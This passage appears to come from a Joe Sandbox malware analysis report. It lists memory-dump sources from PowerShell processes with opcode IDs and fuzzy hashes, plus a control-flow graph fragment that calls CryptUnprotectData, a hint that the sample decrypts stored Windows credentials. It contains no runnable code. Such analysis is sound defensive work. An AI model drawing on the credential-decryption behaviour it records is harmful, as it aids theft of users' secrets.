                                    • Opcode Fuzzy Hash: bdb3e5f2b79ce3bd95c43e45833a96d8b91a6317c5e522bca7c149846a8e3cb9
                                    • Instruction Fuzzy Hash: 63412A3191DB884FD7599B2C98056B97BE0FF96321F0442AFE449C3293DE24AC56C7D2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 16 7ffe7c784aea-7ffe7c785100 18 7ffe7c785107-7ffe7c785181 CryptUnprotectData 16->18 19 7ffe7c785183 18->19 20 7ffe7c785189-7ffe7c7851b8 18->20 19->20
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.109157290614.00007FFE7C780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C780000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_7ffe7c780000_powershell.jbxd
                                    Similarity
                                    • API ID: CryptDataUnprotect
                                    • String ID:
                                    • API String ID: 834300711-0
                                    • Opcode ID: 96bec14d9ead4bf17b06691a0fdb2e997d9c4e6b307983101ac03ef2c72fb64f
                                    • Instruction ID: 3f48c23465e0bd10fb82bfc5a2958437766fb403d3407411058edbc7ea5816c5
                                    • Opcode Fuzzy Hash: 96bec14d9ead4bf17b06691a0fdb2e997d9c4e6b307983101ac03ef2c72fb64f
                                    • Instruction Fuzzy Hash: 7931943191CA089FDB58DF5CD8066B9B7E0FB69311F10422FE449D3651DB74B8558BC2
                                    Memory Dump Source
                                    • Source File: 00000019.00000002.110339173617.00007FFE7C750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C750000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_25_2_7ffe7c750000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 217d8db265501a41e52c7e8e042356b5383d2ea3dc58a3e5508cbdced9399b67
                                    • Instruction ID: 0ead6bc7fdf9c7272ca7bfc1a253384ee914ec2ea33c6099b8d6185e79e727f6
                                    • Opcode Fuzzy Hash: 217d8db265501a41e52c7e8e042356b5383d2ea3dc58a3e5508cbdced9399b67
                                    • Instruction Fuzzy Hash: 98310531A0C64C8FEB48DFACD84A7F9BBE4EF56321F04416FD049C32A2DA64A855CB51
                                    Memory Dump Source
                                    • Source File: 00000019.00000002.110339173617.00007FFE7C750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C750000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_25_2_7ffe7c750000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 21c2870597ca4ab3b17c483df6b1e94903ff03a010036b1c1aff0e94a9a58453
                                    • Instruction ID: 124babd72188051fafa50ab9001af7da3daacc30cae3dc8771d3c6702fd56459
                                    • Opcode Fuzzy Hash: 21c2870597ca4ab3b17c483df6b1e94903ff03a010036b1c1aff0e94a9a58453
                                    • Instruction Fuzzy Hash: A421B231A1C60C8FEB58EF9CD8467F97BE4EB69321F00416FD04AC3262DA75A856CB51
                                    Memory Dump Source
                                    • Source File: 00000019.00000002.110339173617.00007FFE7C750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C750000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_25_2_7ffe7c750000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb41c5088c83ff3ff9212e5f6e9c405d94860b8db11be397b3e57a14267cfe5e
                                    • Instruction ID: 4aedd4c71934944c4ff5afca798f692760618f52acb543baec52830bd10bd5d9
                                    • Opcode Fuzzy Hash: bb41c5088c83ff3ff9212e5f6e9c405d94860b8db11be397b3e57a14267cfe5e
                                    • Instruction Fuzzy Hash: 6001843111CB0C4FD744EF0CE451AA5B3E0FB85320F10052EE58AC36A1DA22E892CB46
                                    Memory Dump Source
                                    • Source File: 00000019.00000002.110339173617.00007FFE7C750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C750000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_25_2_7ffe7c750000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cfd47f174324f9a22b5e5272a3d174732f1133694c582eea0705d3e37229b732
                                    • Instruction ID: c8e5427aeb6591c73497108e3e2b98dc7ec40ffd8bbe304ff438977885b82beb
                                    • Opcode Fuzzy Hash: cfd47f174324f9a22b5e5272a3d174732f1133694c582eea0705d3e37229b732
                                    • Instruction Fuzzy Hash: AEC04C45EABD1B01FF8D717E28571B964869F84101FC48478D829C03B6DD5D99952541
                                    Memory Dump Source
                                    • Source File: 00000035.00000002.109313447734.00007FFE7C760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C760000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_53_2_7ffe7c760000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                    • Instruction ID: c1db0010ad5b7d98c00015a0dbd71988a246e94aee8b98e2542c662cf0257ff7
                                    • Opcode Fuzzy Hash: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                    • Instruction Fuzzy Hash: BC01A73111CB0C8FD744EF0CE451AA5B3E0FB85320F10056EE58AC36A1DB32E882CB42
                                    Memory Dump Source
                                    • Source File: 00000035.00000002.109314388789.00007FFE7C830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C830000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_53_2_7ffe7c830000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a6526965b06fd78193fcbc5fe23b36ae305693e0c5635f0d0796f98b1c3698e6
                                    • Instruction ID: df67ac4893fbb02017cd38132805f0f276b1d218a6f670bd9a39570554448280
                                    • Opcode Fuzzy Hash: a6526965b06fd78193fcbc5fe23b36ae305693e0c5635f0d0796f98b1c3698e6
                                    • Instruction Fuzzy Hash: 48F0C232B5DA1E4FF768A76CA4414B8B7D5EF46224B4411BAD11EC7563DE35FC02C244
                                    Memory Dump Source
                                    • Source File: 00000035.00000002.109314388789.00007FFE7C830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C830000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_53_2_7ffe7c830000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5fe13ad6153f7b523c03973d3481cd0997ad7f32c2b7b2d65249b3137d6b3b30
                                    • Instruction ID: 9545ac1d68b0b734631ba8207342a3912f30d51c380d892213d4cca6958f9b85
                                    • Opcode Fuzzy Hash: 5fe13ad6153f7b523c03973d3481cd0997ad7f32c2b7b2d65249b3137d6b3b30
                                    • Instruction Fuzzy Hash: EFF062326685098FDB88DF0CD8809A8B3F5FF44300B541179E019D3661CA35FC92CB80
                                    Memory Dump Source
                                    • Source File: 00000035.00000002.109314388789.00007FFE7C830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C830000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_53_2_7ffe7c830000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1b16867dbee5be100bf16c19bbecd3bbbdb931dd0d5a2dd42b77424fac95339b
                                    • Instruction ID: 94328c33f55492248546e18bffe11f451db77cc4834ddd208d42be49afd7f571
                                    • Opcode Fuzzy Hash: 1b16867dbee5be100bf16c19bbecd3bbbdb931dd0d5a2dd42b77424fac95339b
                                    • Instruction Fuzzy Hash: 34F03032A6DA198EE318971CA4414B8B3E1EB8531575450BAE01DC7572DE75B8528644
                                    Memory Dump Source
                                    • Source File: 00000035.00000002.109314388789.00007FFE7C830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C830000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_53_2_7ffe7c830000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a61b53deca6a36057737c7a9fc97c0fb8467808d2e2574ba9708d3894a2e7542
                                    • Instruction ID: f5cd38ce51ae111190e6316c57d75f7a7cf29ba4ac1b7e40a93ec8517976356c
                                    • Opcode Fuzzy Hash: a61b53deca6a36057737c7a9fc97c0fb8467808d2e2574ba9708d3894a2e7542
                                    • Instruction Fuzzy Hash: F0E0ED33A1C8294EB744A20CB8864FDB3D8EF45230F1800B2D04CD2463DE25B803C280
                                    Memory Dump Source
                                    • Source File: 00000035.00000002.109314388789.00007FFE7C830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C830000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_53_2_7ffe7c830000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 86490c7eb676e0d64b0f13334b84d030be7159ed6155b041ea0f8b32c82f1bd8
                                    • Instruction ID: 203bfc7161424fee25df45ce419f7dbf4b8b019324f2be85ccc59c698db7cde7
                                    • Opcode Fuzzy Hash: 86490c7eb676e0d64b0f13334b84d030be7159ed6155b041ea0f8b32c82f1bd8
                                    • Instruction Fuzzy Hash: 78E01233E1983D5F5F91DB8C94592EDF7A1EB98222B000267D91CE3100CA24986187D4